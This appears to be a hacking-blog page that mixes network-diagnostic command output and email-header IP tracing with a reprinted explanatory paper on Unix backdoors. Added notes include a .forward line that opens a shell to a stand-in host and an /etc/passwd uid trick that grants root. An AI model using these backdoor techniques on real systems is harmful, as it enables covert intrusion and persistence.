1572 inetinfo -> 25 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
1572 inetinfo -> 80 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
1008 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe
4 System -> 139 TCP
1572 inetinfo -> 443 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System -> 445 TCP
1108 svchost -> 1025 TCP C:\WINDOWS\System32\svchost.exe
1572 inetinfo -> 1043 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon -> 1056 TCP \??\C:\WINDOWS\system32\winlogon.exe
4 System -> 1135 TCP
2436 OUTLOOK -> 1162 TCP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 1169 TCP
2436 OUTLOOK -> 1176 TCP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
1232 firefox -> 1219 TCP C:\Program Files\Mozilla Firefox\firefox.exe
1232 firefox -> 1220 TCP C:\Program Files\Mozilla Firefox\firefox.exe
2436 OUTLOOK -> 1221 TCP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 1390 TCP
4 System -> 1451 TCP
4 System -> 1456 TCP
1232 firefox -> 1602 TCP C:\Program Files\Mozilla Firefox\firefox.exe
4 System -> 1634 TCP
0 System -> 1635 TCP
1108 svchost -> 3389 TCP C:\WINDOWS\System32\svchost.exe
1296 -> 5000 TCP
264 WCESCOMM -> 5679 TCP C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE

1572 inetinfo -> 135 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
2436 OUTLOOK -> 137 UDP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 138 UDP
1572 inetinfo -> 445 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
1008 svchost -> 500 UDP C:\WINDOWS\system32\svchost.exe
1572 inetinfo -> 1026 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System -> 1027 UDP
1108 svchost -> 1028 UDP C:\WINDOWS\System32\svchost.exe
1572 inetinfo -> 1049 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon -> 1051 UDP \??\C:\WINDOWS\system32\winlogon.exe
4 System -> 1165 UDP
2436 OUTLOOK -> 1558 UDP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 1900 UDP
1232 firefox -> 1900 UDP C:\Program Files\Mozilla Firefox\firefox.exe
2436 OUTLOOK -> 2967 UDP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 3456 UDP

C:\>

Or Netport:

C:\>netport
NetPort v1.1 - A Visual Log Product
Copyright 2004 by Softgears Company
http://www.softgears.com

Pid Process Port Proto Foreign Address Path
1572 inetinfo 25 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
1572 inetinfo 80 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
1008 svchost 135 TCP: LISTENING C:\WINDOWS\system32\svchost.exe
1572 inetinfo 443 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System 445 TCP: LISTENING
1108 svchost 1025 TCP: LISTENING C:\WINDOWS\System32\svchost.exe
1572 inetinfo 1043 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon 1056 TCP: LISTENING \??\C:\WINDOWS\system32\winlogon.exe
4 System 1135 TCP: LISTENING
2436 OUTLOOK 1162 TCP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1169 TCP: LISTENING
2436 OUTLOOK 1176 TCP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
1232 firefox 1220 TCP: LISTENING C:\Program Files\Mozilla Firefox\firefox.exe
2436 OUTLOOK 1221 TCP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1451 TCP: LISTENING
4 System 1456 TCP: LISTENING
1232 firefox 1602 TCP: LISTENING C:\Program Files\Mozilla Firefox\firefox.exe
1108 svchost 3389 TCP: LISTENING C:\WINDOWS\System32\svchost.exe
1296 System 5000 TCP: LISTENING
264 WCESCOMM 5679 TCP: LISTENING C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
1232 firefox 1219 TCP: LISTENING C:\Program Files\Mozilla Firefox\firefox.exe
1232 firefox 1219 TCP: ESTABLISHED 127.0.0.1:1220 C:\Program Files\Mozilla Firefox\firefox.exe
1232 firefox 1220 TCP: ESTABLISHED 127.0.0.1:1219 C:\Program Files\Mozilla Firefox\firefox.exe
4 System 139 TCP: LISTENING
776 winlogon 1056 TCP: CLOSE_WAIT 134.68.220.157:389 \??\C:\WINDOWS\system32\winlogon.exe
2436 OUTLOOK 1162 TCP: ESTABLISHED 134.68.220.155:1025 C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1169 TCP: ESTABLISHED 192.168.28.33:445
2436 OUTLOOK 1176 TCP: ESTABLISHED 129.79.1.40:1222 C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
2436 OUTLOOK 1221 TCP: ESTABLISHED 129.79.1.214:1249 C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1390 TCP: LISTENING
4 System 1390 TCP: ESTABLISHED 192.168.30.154:139
4 System 1456 TCP: ESTABLISHED 129.79.6.3:445
1232 firefox 1602 TCP: ESTABLISHED 64.233.167.104:80 C:\Program Files\Mozilla Firefox\firefox.exe
4 System 1634 TCP: LISTENING
4 System 1634 TCP: ESTABLISHED 192.168.30.34:139
1008 svchost 135 UDP: LISTENING C:\WINDOWS\system32\svchost.exe
4 System 445 UDP: LISTENING
836 lsass 500 UDP: LISTENING C:\WINDOWS\system32\lsass.exe
1264 System 1026 UDP: LISTENING
1264 System 1027 UDP: LISTENING
836 lsass 1028 UDP: LISTENING C:\WINDOWS\system32\lsass.exe
1572 inetinfo 1049 UDP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon 1051 UDP: LISTENING \??\C:\WINDOWS\system32\winlogon.exe
2436 OUTLOOK 1165 UDP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
1640 Rtvscan 2967 UDP: LISTENING C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
1572 inetinfo 3456 UDP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
4064 FRONTPG 1558 UDP: LISTENING C:\PROGRA~1\MICROS~2\Office10\FRONTPG.EXE
1296 System 1900 UDP: LISTENING
4 System 137 UDP: LISTENING
4 System 138 UDP: LISTENING
1296 System 1900 UDP: LISTENING

For Linux:-

Use the "lsof -i" command:

[root@balrog root]# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
dhclient 467 root 4u IPv4 777 UDP *:bootpc
portmap 533 rpc 3u IPv4 898 UDP *:sunrpc
portmap 533 rpc 4u IPv4 901 TCP *:sunrpc (LISTEN)
rpc.statd 552 rpcuser 4u IPv4 972 UDP *:32768
rpc.statd 552 rpcuser 5u IPv4 939 UDP *:728
rpc.statd 552 rpcuser 6u IPv4 975 TCP *:32768 (LISTEN)
sshd 642 root 3u IPv4 1287 TCP *:ssh (LISTEN)
xinetd 657 root 5u IPv4 1313 TCP localhost.localdomain:32769 (LISTEN)
sendmail 682 root 4u IPv4 1377 TCP localhost.localdomain:smtp (LISTEN)
httpd 712 root 3u IPv4 1422 TCP *:http (LISTEN)
httpd 712 root 4u IPv4 1423 TCP *:https (LISTEN)
sshd 8498 root 4u IPv4 323188 TCP balrog.ius.edu:ssh->winxpe:1644 (ESTABLISHED)
httpd 31094 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31094 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31095 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31095 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31096 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31096 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31097 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31097 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31098 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31098 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31099 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31099 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31100 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31100 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31101 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31101 apache 4u IPv4 1423 TCP *:https (LISTEN)
[root@balrog root]#

8.How do I find out if an IP is contactable?

If the host is not blocking ICMP echo requests (type 8, code 0) try using the "ping" command, it should work from any Unix like OS and from Windows.

UP:

C:\>ping 192.168.1.162

Pinging 192.168.1.162 with 32 bytes of data:

Reply from 192.168.30.130: bytes=32 time<10ms TTL=255
Reply from 192.168.30.130: bytes=32 time<10ms TTL=255
Reply from 192.168.30.130: bytes=32 time<10ms TTL=255
Reply from 192.168.30.130: bytes=32 time<10ms>

Not Up

C:\>ping 192.168.1.162

Pinging 192.168.1.162 with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.1.162:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

9.How do I find out the netbois name from the IP?

On Windows:

C:\>nbtstat -a 192.168.22.68

Local Area Connection:
Node IpAddress: [192.168.22.68] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SE-SSCS-CV112C8<00> UNIQUE Registered
ADS <00> GROUP Registered
SE-SSCS-CV112C8<03> UNIQUE Registered
SE-SSCS-CV112C8<20> UNIQUE Registered
ADS <1E> GROUP Registered
ADRIAN <03> UNIQUE Registered

MAC Address = 00-04-76-39-B6-D9

C:\>

On Unix (if you have nbtstat installed):
[root@tux /root]# nbtstat 192.168.22.68
received data:
A2 48 84 00 00 00 00 01 00 00 00 00 20 43 4B 41 .H.......... CKA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 00 00 21 AAAAAAAAAAAAA..!
00 01 00 00 00 00 00 9B 06 53 45 2D 53 53 43 53 .........SE-SSCS
2D 43 56 31 31 32 43 38 00 44 00 41 44 53 20 20 -CV112C8.D.ADS
20 20 20 20 20 20 20 20 20 20 00 C4 00 53 45 2D ...SE-
53 53 43 53 2D 43 56 31 31 32 43 38 03 44 00 53 SSCS-CV112C8.D.S
45 2D 53 53 43 53 2D 43 56 31 31 32 43 38 20 44 E-SSCS-CV112C8 D
00 41 44 53 20 20 20 20 20 20 20 20 20 20 20 20 .ADS
1E C4 00 41 44 52 49 41 4E 20 20 20 20 20 20 20 ...ADRIAN
20 20 03 44 00 00 04 76 39 B6 D9 00 00 00 00 00 .D...v9.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 8C .....
6 names in response
SE-SSCS-CV112C8<0x00> Unique Workstation Service
ADS <0x00> Group Domain Name
SE-SSCS-CV112C8<0x03> Unique Messenger Service
SE-SSCS-CV112C8<0x20> Unique File Server Service
ADS <0x1e> Group Potential Master Browser
ADRIAN <0x03> Unique Messenger Service
[root@tux /root]#

and the vice versa could be done by:-

On Windows:

C:\>nbtstat -a se-sscs-cv112c8

Local Area Connection:
Node IpAddress: [192.168.22.68] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SE-SSCS-CV112C8<00> UNIQUE Registered
ADS <00> GROUP Registered
SE-SSCS-CV112C8<03> UNIQUE Registered
SE-SSCS-CV112C8<20> UNIQUE Registered
ADS <1E> GROUP Registered
ADRIAN <03> UNIQUE Registered

MAC Address = 00-04-76-39-B6-D9
C:\>

On Unix:

[root@tux /root]# nmblookup se-sscs-cv112c8
querying se-sscs-cv112c8 on 192.168.31.255
192.168.22.68 se-sscs-cv112c8<00>
[root@tux /root]#

10.How do I find out who is logged into a remote Windows system?

On Windows you can try:

C:\>nbtstat -a somesystem
Local Area Connection:

Node IpAddress: [192.168.22.68] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SE-SSCS-CV112C5<00> UNIQUE Registered
ADS <00> GROUP Registered
SE-SSCS-CV112C5<03> UNIQUE Registered
ADS <1E> GROUP Registered
JDOE <03> UNIQUE Registered

MAC Address = 00-04-76-39-A9-F9
C:\>

But if Netbios over TCP/IP it turned off it won't work.
In that case you may have to use a WMI script, but you would have to be an Admin on the remote box.
On Unix:

bash-2.05# nmblookup -S somebox
querying se-sscs-cv112c5 on 192.168.31.255
192.168.22.59 somebox <00>
Looking up status of 192.168.22.59
SE-SSCS-CV112C5 <00> - M
ADS <00> - M
SE-SSCS-CV112C5 <03> - M
ADS <1e> - M
JDOE <03> - M

bash-2.05#
The above will only work is the Windows box has Netbios over TCP/IP it turned on.

11.How do I find out the IP address from the mails received?

Iam just going to explain two of the most popular mail servers
1.Yahoo
2.Hotmail

1.Yahoo

To find the Ip address from the mails recieved we must find the header
of the mail.To enable it do the following.

After signin in your id and password .You are in the page where it welcomes you
On the right top conner you can find Options .Just click it.
So here you are in a page where you can find Anti-Spam Resource Centre,
Block Addresses,Filters,General Preferences,Signature...ect

Click General Preferences
Under Messages you can find Headers,Font size ect
Click the option Show all headers on imcoming messages
and click the save button at the bottom.

Now check your mail and it will look something like this

X-Apparently-To: boo_iggers@yahoo.com via 68.142.207.223; Sat, 08 Oct 2005 00:16:20 -0700
X-Originating-IP: [66.163.179.108]
Return-Path:
Authentication-Results: mta251.mail.mud.yahoo.com from=yahoo.com; domainkeys=pass (ok)
Received: from 66.163.179.108 (HELO web35314.mail.mud.yahoo.com) (66.163.179.108) by mta251.mail.mud.yahoo.com with SMTP; Sat, 08 Oct 2005 00:16:20 -0700
Received: (qmail 59981 invoked by uid 60001); 8 Oct 2005 07:16:04 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=y/8AiVLdM96BbwqqWGE4jVGW9HvwN3HPkeChVmy75EKnxDer6AHQYZo V0HtC9PkFQS1AseKIaxvHyf9N9YMwhCSLzo3Of4AsQzF2KWQ3ZdxxOQLlL1LBryd5cfSIgu6wuP3TDEPSJZDPCAR1kZ138L7sd24SUOoj7AoDTV60150= ; Message-ID: <20051008071604>
Received: from [59.92.35.72] by web35314.mail.mud.yahoo.com via HTTP; Sat, 08 Oct 2005 00:16:03 PDT
Date: Sat, 8 Oct 2005 00:16:03 -0700 (PDT)
From: "james carner" Add to Address Book Add Mobile Alert
Yahoo! DomainKeys has confirmed that this message was sent by yahoo.com. Learn more
Subject: Fwd: collegelife
To: raam_naam_satya_hai@yahoo.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-714430323-1128755763=:58781"
Content-Transfer-Encoding: 8bit
Content-Length: 417230

Received: from [59.92.35.72] by web35314.mail.mud.yahoo.com via HTTP; Sat, 08 Oct 2005 00:16:03 PDT

where 59.92.35.72 is the ip of the one send this mail usually in [..]

2.Hotmail

After Loggin on the Right top corner you can find Options.Just Click it.
And then click the Mail on the left under personal and click mail display settings.
Select full in message Headers and click ok

Then in the mail you can see something like this

MIME-Version: 1.0
Received: from web32514.mail.mud.yahoo.com ([68.142.207.224]) by bay0-mc1-f15.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Tue, 20 Dec 2005 02:01:10 -0800
Received: (qmail 48874 invoked by uid 60001); 20 Dec 2005 10:01:09 -0000
Received: from [59.92.97.178] by web32514.mail.mud.yahoo.com via HTTP; Tue, 20 Dec 2005 02:01:09 PST
X-Message-Info: JGTYoYF78jGeFkOXv4J7uO2ag1L4jHLrO91IFQszAj4=
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=ChOifmyOhue+LKXKIxMj9fnDxP56wkOvrq0jwgf+H558LTYsjEBKd0sTlmqcHqVAjv/0ormxPKAsb252f4nSweX/36aKWe30b7OnaCqk1Z8ZxytmQVSY19LC5MI42T/s7hpiTb7tbIg8nipPJTtA8+xzXNkoUKzMI+PQVKXFFmk= ;
Return-Path: raam_naam_satya_hai@yahoo.com
X-OriginalArrivalTime: 20 Dec 2005 10:01:10.0963 (UTC) FILETIME=[4DEC6830:01C6054C]

Received: from [59.92.97.178] by web32514.mail.mud.yahoo.com via HTTP; Tue, 20 Dec 2005 02:01:09 PST

Here 59.92.97.178 is the IP of the one who send this mail to me.

=============================================================

A video On Completely Taking Over A Remote PC :

Hiya Hackerz,
Here i m posting another video made by me that shows how 2 get into a remote pc n completely take over d pc. Twisted Evil
Shocked!! but this is true...............
Check it out.............

Click here to download this video
SAUV :windows nt and xp ae based on the concept of sam.
All the pass and other things are stored in the form of sam files...

2008-08-04T11:01:00.000-07:00

System Backdoor explained :

Since the early days of intruders breaking into computers, they have tried

to develop techniques or backdoors that allow them to get back into the

system. In this paper, it will be focused on many of the common backdoors

and possible ways to check for them. Most of focus will be on Unix

backdoors with some discussion on future Windows NT backdoors. This will

describe the complexity of the issues in trying to determine the methods

that intruders use and the basis for administrators understanding on how

they might be able to stop the intruders from getting back in. When an

administrator understands how difficult it would be to stop intruder once

they are in, the appreciation of being proactive to block the intruder from

ever getting in becomes better understood. This is intended to cover many

of the popular commonly used backdoors by beginner and advanced intruders.

This is not intended to cover every possible way to create a backdoor as

the possibilities are limitless.

The backdoor for most intruders provide two or three main functions:

Be able to get back into a machine even if the administrator tries to

secure it, e.g., changing all the passwords.

Be able to get back into the machine with the least amount of visibility.

Most backdoors provide a way to avoid being logged and many times the

machine can appear to have no one online even while an intruder is using

it.

Be able to get back into the machine with the least amount of time. Most

intruders want to easily get back into the machine without having to do all

the work of exploiting a hole to gain access.

In some cases, if the intruder may think the administrator may detect any

installed backdoor, they will resort to using the vulnerability repeatedly

to get on a machine as the only backdoor. Thus not touching anything that

may tip off the administrator. Therefore in some cases, the

vulnerabilities on a machine remain the only unnoticed backdoor.

Password Cracking Backdoor

One of the first and oldest methods of intruders used to gain not only

access to a Unix machine but backdoors was to run a password cracker. This

uncovers weak passworded accounts. All these new accounts are now possible

backdoors into a machine even if the system administrator locks out the

intruder's current account. Many times, the intruder will look for unused

accounts with easy passwords and change the password to something

difficult. When the administrator looked for all the weak passworded

accounts, the accounts with modified passwords will not appear. Thus the

administrator will not be able to easily determine which accounts to lock

out.

Rhosts + + Backdoor

On networked Unix machines, services like Rsh and Rlogin used a simple

authentication method based on hostnames that appear in rhosts. A user

could easily configure which machines not to require a password to log

into. An intruder that gained access to someone's rhosts file could put a

"+ +" in the file and that would allow anyone from anywhere to log into

that account without a password. Many intruders use this method especially

when NFS is exporting home directories to the world. These accounts

become backdoors for intruders to get back into the system. Many intruders

prefer using Rsh over Rlogin because it is many times lacking any logging

capability. Many administrators check for "+ +" therefore an intruder may

actually put in a hostname and username from another compromised account on

the network, making it less obvious to spot.

Checksum and Timestamp Backdoors

Early on, many intruders replaced binaries with their own trojan versions.

Many system administrators relied on time-stamping and the system checksum

programs, e.g., Unix's sum program, to try to determine when a binary file

has been modified. Intruders have developed technology that will recreate

the same time-stamp for the trojan file as the original file. This is

accomplished by setting the system clock time back to the original file's

time and then adjusting the trojan file's time to the system clock. Once

the binary trojan file has the exact same time as the original, the system

clock is reset to the current time. The sum program relies on a CRC

checksum and is easily spoofed. Intruders have developed programs that

would modify the trojan binary to have the necessary original checksum,

thus fooling the administrators. MD5 checksums is the recommended choice

to use today by most vendors. MD5 is based on an algorithm that no one has

yet to date proven can be spoofed.

Login Backdoor

On Unix, the login program is the software that usually does the password

authentication when someone telnets to the machine. Intruders grabbed the

source code to login.c and modified it that when login compared the user's

password with the stored password, it would first check for a backdoor

password. If the user typed in the backdoor password, it would allow you to

log in regardless of what the administrator sets the passwords to. Thus

this allowed the intruder to log into any account, even root. The

password backdoor would spawn access before the user actually logged in and

appeared in utmp and wtmp. Therefore an intruder could be logged in and

have shell access without it appearing anyone is on that machine as that

account. Administrators started noticing these backdoors especially if

they did a "strings" command to find what text was in the login program.

Many times the backdoor password would show up. The intruders then

encrypted or hid the backdoor password better so it would not appear by

just doing strings. Many of the administrators can detect these backdoors

with MD5 checksums.

Telnetd Backdoor

When a user telnets to the machine, inetd service listens on the port and

receive the connection and then passes it to in.telnetd, that then runs

login. Some intruders knew the administrator was checking the login

program for tampering, so they modified in.telnetd. Within in.telnetd, it

does several checks from the user for things like what kind of terminal the

user was using. Typically, the terminal setting might be Xterm or VT100.

An intruder could backdoor it so that when the terminal was set to

"letmein", it would spawn a shell without requiring any authentication.

Intruders have backdoored some services so that any connection from a

specific source port can spawn a shell.

Services Backdoor

Almost every network service has at one time been backdoored by an

intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even

inetd, etc., have been floating around forever. There are programs that

are nothing more than a shell connected to a TCP port with maybe a backdoor

password to gain access. These programs sometimes replace a service like

uucp that never gets used or they get added to the inetd.conf file as a new

service. Administrators should be very wary of what services are running

and analyze the original services by MD5 checksums.

Cronjob backdoor

Cronjob on Unix schedules when certain programs should be run. An intruder

could add a backdoor shell program to run between 1 AM and 2 AM. So for 1

hour every night, the intruder could gain access. Intruders have also

looked at legitimate programs that typically run in cronjob and built

backdoors into those programs as well.

Library backdoors

Almost every UNIX system uses shared libraries. The shared libraries are

intended to reuse many of the same routines thus cutting down on the size

of programs. Some intruders have backdoored some of the routines like

crypt.c and _crypt.c. Programs like login.c would use the crypt() routine

and if a backdoor password was used it would spawn a shell. Therefore,

even if the administrator was checking the MD5 of the login program, it was

still spawning a backdoor routine and many administrators were not checking

the libraries as a possible source of backdoors.

One problem for many intruders was that some administrators started MD5

checksums of almost everything. One method intruders used to get around

that is to backdoor the open() and file access routines. The backdoor

routines were configured to read the original files, but execute the trojan

backdoors. Therefore, when the MD5 checksum program was reading these

files, the checksums always looked good. But when the system ran the

program, it executed the trojan version. Even the trojan library itself,

could be hidden from the MD5 checksums. One way to an administrator could

get around this backdoor was to statically link the MD5 checksum checker

and run on the system. The statically linked program does not use the

trojan shared libraries.

Kernel backdoors

The kernel on Unix is the core of how Unix works. The same method used for

libraries for bypassing MD5 checksum could be used at the kernel level,

except even a statically linked program could not tell the difference. A

good backdoored kernel is probably one of the hardest to find by

administrators, fortunately kernel backdoor scripts have not yet been

widely made available and no one knows how wide spread they really are.

File system backdoors

An intruder may want to store their loot or data on a server somewhere

without the administrator finding the files. The intruder's files can

typically contain their toolbox of exploit scripts, backdoors, sniffer

logs, copied data like email messages, source code, etc. To hide these

sometimes large files from an administrator, an intruder may patch the

files system commands like "ls", "du", and "fsck" to hide the existence of

certain directories or files. At a very low level, one intruder's backdoor

created a section on the hard drive to have a proprietary format that was

designated as "bad" sectors on the hard drive. Thus an intruder could

access those hidden files with only special tools, but to the regular

administrator, it is very difficult to determine that the marked "bad"

sectors were indeed storage area for the hidden file system.

Bootblock backdoors

In the PC world, many viruses have hid themselves within the bootblock

section and most antivirus software will check to see if the bootblock has

been altered. On Unix, most administrators do not have any software that

checks the bootblock, therefore some intruders have hidden some backdoors

in the bootblock area.

Process hiding backdoors

An intruder many times wants to hide the programs they are running. The

programs they want to hide are commonly a password cracker or a sniffer.

There are quite a few methods and here are some of the more common:

An intruder may write the program to modify its own argv[] to make it look

like another process name.

An intruder could rename the sniffer program to a legitimate service like

in.syslog and run it. Thus when an administrator does a "ps" or looks at

what is running, the standard service names appear.

An intruder could modify the library routines so that "ps" does not show

all the processes.

An intruder could patch a backdoor or program into an interrupt driven

routine so it does not appear in the process table. An example backdoor

using this technique is amod.tar.gz available on

http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

An intruder could modify the kernel to hide certain processes as well.

Rootkit

One of the most popular packages to install backdoors is rootkit. It can

easily be located using Web search engines. From the Rootkit README, here

are the typical files that get installed:

z2 - removes entries from utmp, wtmp, and lastlog.

Es - rokstar's ethernet sniffer for sun4 based kernels.

Fix - try to fake checksums, install with same dates/perms/u/g.

Sl - become root via a magic password sent to login.

Ic - modified ifconfig to remove PROMISC flag from output.

ps: - hides the processes.

Ns - modified netstat to hide connections to certain machines.

Ls - hides certain directories and files from being listed.

du5 - hides how much space is being used on your hard drive.

ls5 - hides certain files and directories from being listed.

Network traffic backdoors

Not only do intruders want to hide their tracks on the machine, but also

they want to hide their network traffic as much as possible. These network

traffic backdoors sometimes allow an intruder to gain access through a

firewall. There are many network backdoor programs that allow an intruder

to set up on a certain port number on a machine that will allow access

without ever going through the normal services. Because the traffic is

going to a non-standard network port, the administrator can overlook the

intruder's traffic. These network traffic backdoors are typically using

TCP, UDP, and ICMP, but it could be many other kinds of packets.

TCP Shell Backdoors

The intruder can set up these TCP Shell backdoors on some high port number

possibly where the firewall is not blocking that TCP port. Many times,

they will be protected with a password just so that an administrator that

connects to it, will not immediately see shell access. An administrator

can look for these connections with netstat to see what ports are listening

and where current connections are going to and from. Many times, these

backdoors allow an intruder to get past TCP Wrapper technology. These

backdoors could be run on the SMTP port, which many firewalls allow traffic

to pass for e-mail.

UDP Shell Backdoors

Administrator many times can spot a TCP connection and notice the odd

behavior, while UDP shell backdoors lack any connection so netstat would

not show an intruder accessing the Unix machine. Many firewalls have been

configured to allow UDP packets for services like DNS through. Many times,

intruders will place the UDP Shell backdoor on that port and it will be

allowed to by-pass the firewall.

ICMP Shell Backdoors

Ping is one of the most common ways to find out if a machine is alive by

sending and receiving ICMP packets. Many firewalls allow outsiders to ping

internal machines. An intruder can put data in the Ping ICMP packets and

tunnel a shell between the pinging machines. An administrator may notice a

flurry of Ping packets, but unless the administrator looks at the data in

the packets, an intruder can be unnoticed.

Encrypted Link

An administrator can set up a sniffer trying to see data appears as someone

accessing a shell, but an intruder can add encryption to the Network

traffic backdoors and it becomes almost impossible to determine what is

actually being transmitted between two machines.

Windows NT

Because Windows NT does not easily allow multiple users on a single machine

and remote access similar as Unix, it becomes harder for the intruder to

break into Windows NT, install a backdoor, and launch an attack from it.

Thus you will find more frequently network attacks that are spring boarded

from a Unix box than Windows NT. As Windows NT advances in multi-user

technologies, this may give a higher frequency of intruders who use Windows

NT to their advantage. And if this does happen, many of the concepts from

Unix backdoors can be ported to Windows NT and administrators can be ready

for the intruder. Today, there are already telnet daemons available for

Windows NT. With Network Traffic backdoors, they are very feasible for

intruders to install on Windows NT.

Solutions

As backdoor technology advances, it becomes even harder for administrators

to determine if an intruder has gotten in or if they have been successfully

locked out.

Assessment

One of the first steps in being proactive is to assess how vulnerable your

network is, thus being able to figure out what holes exist that should be

fixed. Many commercial tools exist to help scan and audit the network and

systems for vulnerabilities. Many companies could dramatically improve

their security if they only installed the security patches made freely

available by their vendors.

MD5 Baselines

One necessary component of a system scanner is MD5 checksum baselines.

This MD5 baseline should be built up before a hacker attack with clean

systems. Once a hacker is in and has installed backdoors, trying to create

a baseline after the fact could incorporate the backdoors into the

baseline. Several companies had been hacked and had backdoors installed on

their systems for many months. Overtime, all the backups of the systems

contained the backdoors. When some of these companies found out they had

a hacker, they restored a backup in hopes of removing any backdoors. The

effort was futile since they were restoring all the files, even the

backdoored ones. The binary baseline comparison needs to be done before an

attack happens.

Intrusion detection

Intrusion detection is becoming more important as organizations are hooking

up and allowing connections to some of their machines. Most of the older

intrusion detection technology was log-based events. The latest intrusion

detection system (IDS) technology is based on real-time sniffing and

network traffic security analysis. Many of the network traffic backdoors

can now easily be detected. The latest IDS technology can take a look at

the DNS UDP packets and determine if it matches the DNS protocol requests.

If the data on the DNS port does not match the DNS protocol, an alert flag

can be signaled and the data captured for further analysis. The same

principle can be applied to the data in an ICMP packet to see if it is the

normal ping data or if it is carrying encrypted shell session.

Boot from CD-ROM.

Some administrators may want to consider booting from CD-ROM thus

eliminating the possibility of an intruder installing a backdoor on the

CD-ROM. The problem with this method is the cost and time of implementing

this solution enterprise wide.

Vigilant

Because the security field is changing so fast, with new vulnerabilities

being announced daily and intruders are constantly designing new attack and

backdoor techniques, no security technology is effective without vigilance.

Be aware that no defense is foolproof, and that there is no substitute for

diligent attention.

-------------------------------------------------------------------------

you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also

a common method of regaining access. For the account ``username''

a .forward file might be constructed as follows:

\username

|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

permutations of this method include alteration of the systems mail

aliases file (most commonly located at /etc/aliases). Note that

this is a simple permutation, the more advanced can run a simple

script from the forward file that can take arbitrary commands via

stdin (after minor preprocessing).

PS: The above method is also useful gaining access a companies

mailhub (assuming there is a shared a home directory FS on

the client and server).

> Using smrsh can effectively negate this backdoor (although it's quite

> possibly still a problem if you allow things like elm's filter or

> procmail which can run programs themselves...).

---------------------------------------------------------------------------

you may want to add this "feature" that can act as a backdoor:

when specifying a wrong uid/gid in the /etc/password file,

most login(1) implementations will fail to detect the wrong

uid/gid and atoi(3) will set uid/gid to 0, giving superuser

privileges.

example:

rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh

on Linux boxes, this will give uid 0 to user rmartin.

Some useful commands in cmd :

